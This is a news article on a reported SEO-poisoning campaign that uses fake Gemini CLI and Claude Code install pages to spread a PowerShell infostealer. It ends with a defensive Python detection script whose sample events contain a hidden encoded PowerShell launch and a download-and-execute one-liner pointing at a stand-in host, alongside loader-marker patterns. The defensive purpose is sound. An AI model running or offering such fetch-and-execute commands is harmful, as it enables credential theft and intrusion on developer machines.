Researchers Uncover SEO-Poisoned Sites Delivering Infostealers
Security researchers at EclecticIQ have detailed an SEO poisoning campaign that used typosquatted domains impersonating Google's Gemini CLI and Anthropic's Claude Code to deliver an in-memory PowerShell infostealer to Windows developer workstations, according to an EclecticIQ report published in May 2026. The initial discovery was flagged by independent researcher @g0njxa on April 21, 2026, and EclecticIQ says the attacker-controlled domains were deployed beginning in early March 2026. The campaign used search-engine manipulation to surface fake installer pages, and the malware harvests browser credentials, session cookies and OAuth tokens, plus CI/CD credentials and VPN details, then exfiltrates the data over an encrypted channel to a command-and-control (C2) server, per EclecticIQ and reporting in Infosecurity Magazine.
What happened
EclecticIQ documented an ongoing SEO poisoning campaign that impersonates the installation pages for Google's and Anthropic's developer tooling and delivers an information-stealing payload to Windows hosts, according to its May 2026 intelligence report and coverage by Infosecurity Magazine. The first public flag came from independent researcher @g0njxa on April 21, 2026; EclecticIQ traces the attacker-controlled domains back to early March 2026. Both sources describe typosquatted domains and search-engine manipulation used to push fake installer pages, mimicking the legitimate Gemini CLI and Claude Code installation flows, to the top of search results.
Technical details
EclecticIQ reports that the malware executes entirely in memory via PowerShell, targets Windows endpoints and exfiltrates collected data over an encrypted channel to a command-and-control server. The researchers describe broad collection capabilities: stored credentials and session data from both Chromium-family browsers and Firefox, and authentication artifacts pulled from collaboration and communication clients. EclecticIQ lists targeted sources of secrets including:
- Slack, Microsoft Teams, Discord, Zoom, Telegram Desktop and others, from which session cookies, local state files and DPAPI-protected keys are collected;
- OAuth tokens, CI/CD credentials and corporate VPN details, which EclecticIQ highlights as items of particular interest to financially motivated operators.
EclecticIQ also notes the stealer enables arbitrary remote code execution, providing operators a pathway to hands-on-keyboard intrusions after initial compromise.
Editorial analysis - technical context
Campaigns that impersonate developer tooling and package installers lean on search-ranking manipulation because developer workflows often start with a web search for the install command. SEO-poisoning operators benefit from cheap domain registration and typosquatting to intercept those installs, and in-memory PowerShell loaders remain a standard technique for evading disk-based detection, although PowerShell script block logging and AMSI still expose the decoded script content at execution time. For practitioners, this pattern raises the importance of reproducible, offline-install workflows (pinned sources and verified hashes) for critical developer tools, and of endpoint monitoring that catches in-memory execution chains rather than only files written to disk.
Context and significance
EclecticIQ frames this campaign as part of a broader trend where financially motivated eCrime actors capitalize on enterprises' adoption of AI developer tooling to reach high-value developer workstations. Reporting cites domain choices including .co.uk, .us.com and .us.org as evidence the campaign may be geographically tailored toward users in the US and UK, per EclecticIQ. Public reporting links the discovery timeline to activity beginning in March 2026 and public disclosure in April and May 2026.
What to watch
Observers should monitor malicious domain takedowns and search-engine remediation, public disclosures from the impersonated platform vendors, and law-enforcement actions against infostealer C2 infrastructure. Detection signals worth tracking include spikes in in-memory PowerShell execution on the same host shortly after a web download from a newly registered or typosquatted domain, and OAuth token or CI/CD credential use from unexpected sources following developer-workstation browsing activity.
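The two detection signals above (in-memory PowerShell loaders, and their correlation with a download from a newly registered or brand-lookalike domain) can be expressed as a small SIEM-side rule. The following is an added example written for this article, not code from EclecticIQ or from either vendor: it runs over constructed process-creation and web-proxy events, flags PowerShell command lines that carry fileless-loader markers, and raises the severity when the same host fetched something from a suspicious domain within an assumed 15-minute window. The brand list, allowlist, domain-age threshold, window and event field names are all assumptions.

```python
"""Added example: correlate in-memory PowerShell execution with a preceding
download from a newly registered or brand-lookalike domain on the same host.
All events are constructed; thresholds, allowlist and field names are assumptions."""
from datetime import datetime, timedelta
import re

BRANDS = ("gemini", "claude", "anthropic")          # brands impersonated per the report
ALLOWLIST = ("google.com", "anthropic.com", "github.com")  # assumed legitimate domains
NEW_DOMAIN_DAYS = 30                                 # assumed "newly registered" cut-off
WINDOW = timedelta(minutes=15)                       # assumed download-to-execution window
SUFFIX_LABELS = {"com", "org", "net", "co", "uk", "us", "io"}  # tiny stand-in for the PSL

# Command-line markers typical of fileless PowerShell loaders.
INMEMORY_RE = re.compile(
    r"(?i)(?:(?:^|\s)-e(?:nc(?:odedcommand)?)?\s"   # -e / -enc / -EncodedCommand
    r"|\bIEX\b|Invoke-Expression"                    # evaluate a string as code
    r"|DownloadString|Invoke-RestMethod|\birm\b"     # fetch code over HTTP
    r"|FromBase64String)"                            # decode an embedded stage
)


def is_inmemory_powershell(cmdline: str) -> bool:
    """True when a process command line looks like a fileless PowerShell loader."""
    return "powershell" in cmdline.lower() and INMEMORY_RE.search(cmdline) is not None


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain: str) -> str:
    """Strip known suffix labels (.com, .co.uk, .us.com, ...) to the registered label."""
    labels = domain.lower().rstrip(".").split(".")
    while len(labels) > 1 and labels[-1] in SUFFIX_LABELS:
        labels.pop()
    return labels[-1]


def lookalike_brand(domain: str):
    """Return the impersonated brand if the registered label contains a brand name
    or a close typo of one and the domain is not allowlisted; otherwise None."""
    d = domain.lower().rstrip(".")
    if any(d == a or d.endswith("." + a) for a in ALLOWLIST):
        return None
    for token in re.split(r"[-_.]", registrable_label(d)):
        for brand in BRANDS:
            if token == brand or (len(token) >= 4 and levenshtein(token, brand) <= 2):
                return brand
    return None


def suspicious_download_reasons(ev: dict) -> list:
    reasons = []
    if ev["domain_age_days"] < NEW_DOMAIN_DAYS:
        reasons.append("newly-registered")
    brand = lookalike_brand(ev["domain"])
    if brand:
        reasons.append(f"lookalike:{brand}")
    return reasons


def correlate(process_events: list, proxy_events: list) -> list:
    """One alert per in-memory PowerShell event; 'high' when a suspicious download
    from the same host precedes it within WINDOW, otherwise 'medium'."""
    alerts = []
    for p in process_events:
        if not is_inmemory_powershell(p["cmdline"]):
            continue
        hits = []
        for d in proxy_events:
            if d["host"] != p["host"] or not (p["ts"] - WINDOW <= d["ts"] <= p["ts"]):
                continue
            reasons = suspicious_download_reasons(d)
            if reasons:
                hits.append((d["domain"], reasons))
        alerts.append({"host": p["host"], "ts": p["ts"].isoformat(), "parent": p["parent"],
                       "severity": "high" if hits else "medium", "downloads": hits})
    return alerts


_ts = datetime.fromisoformat

# Constructed sample telemetry (not real logs). "SQBFAFgA" is UTF-16LE "IEX" in base64.
PROXY_EVENTS = [
    {"ts": _ts("2026-04-21T10:00:00"), "host": "dev-ws-01", "domain": "gemeni-cli-install.us.com", "domain_age_days": 20},
    {"ts": _ts("2026-04-21T10:01:00"), "host": "dev-ws-02", "domain": "github.com", "domain_age_days": 6000},
    {"ts": _ts("2026-04-21T09:00:00"), "host": "dev-ws-03", "domain": "claude-code.co.uk", "domain_age_days": 45},
]
PROCESS_EVENTS = [
    {"ts": _ts("2026-04-21T10:03:00"), "host": "dev-ws-01", "parent": "explorer.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ts": _ts("2026-04-21T10:02:00"), "host": "dev-ws-02", "parent": "cmd.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File build.ps1"},
    {"ts": _ts("2026-04-21T10:05:00"), "host": "dev-ws-03", "parent": "explorer.exe",
     "cmdline": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
]


def run_detection() -> list:
    return correlate(PROCESS_EVENTS, PROXY_EVENTS)


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```

On the constructed data, dev-ws-01 produces a high-severity alert (loader markers plus a download from a 20-day-old domain whose label is one edit from "gemini"), dev-ws-03 a medium one (loader markers, but the lookalike download fell outside the window), and the build script on dev-ws-02 nothing. In production the domain age would come from WHOIS or passive DNS enrichment and the loader markers should be supplemented with PowerShell script block logs, which show the decoded script regardless of how it was obfuscated on the command line.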
Scoring Rationale
The campaign targets developer tooling to harvest high-value secrets (OAuth tokens, CI/CD credentials), which materially raises enterprise supply-chain and initial-access risk. The techniques, SEO poisoning and in-memory PowerShell loaders, are familiar but effective, making the story notable for security teams and DevOps engineers.